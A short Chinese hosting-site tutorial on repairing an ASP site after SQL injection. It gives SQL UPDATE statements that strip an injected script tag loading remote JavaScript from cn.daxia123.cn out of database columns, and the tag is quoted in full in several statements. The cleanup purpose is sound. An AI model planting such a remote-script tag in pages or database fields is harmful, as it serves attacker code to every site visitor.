海外主机侦探 | 海外主机资讯评测教程 最大的中文海外空间交流社区

asp网站被sql注入怎么办

2016年05月05日10:53      归档于:      作者:080103218      我要评论(0)

1、varchar 类型的直接replace一下就ok了。
 
如:"update [t_information] set publisher=replace(publisher, '<script src=http://cn.daxia123.cn/cn.js></script>', '')"
 
2、text字段,就要麻烦一下(超过8000就要另想办法了)
"update [t_information] set AuthorInfor=replace(cast(AuthorInfor as varchar(8000)) ,'<script src=http://cn.daxia123.cn/cn.js></script>','')"
 
3、有时有特殊符号,如 %,可以用下列的方法处理一下
update [infor_types] set parentid=replace(parentid, char(37), '')
 
关键是要加屏蔽的语句。

温馨提示:

1.本文评论没有专人回复,如果您有问题请到海外主机侦探论坛提问!

2.海外主机侦探免费为您提供海外主机购买咨询,请联系QQ:800013301

Tags:
HostEase主机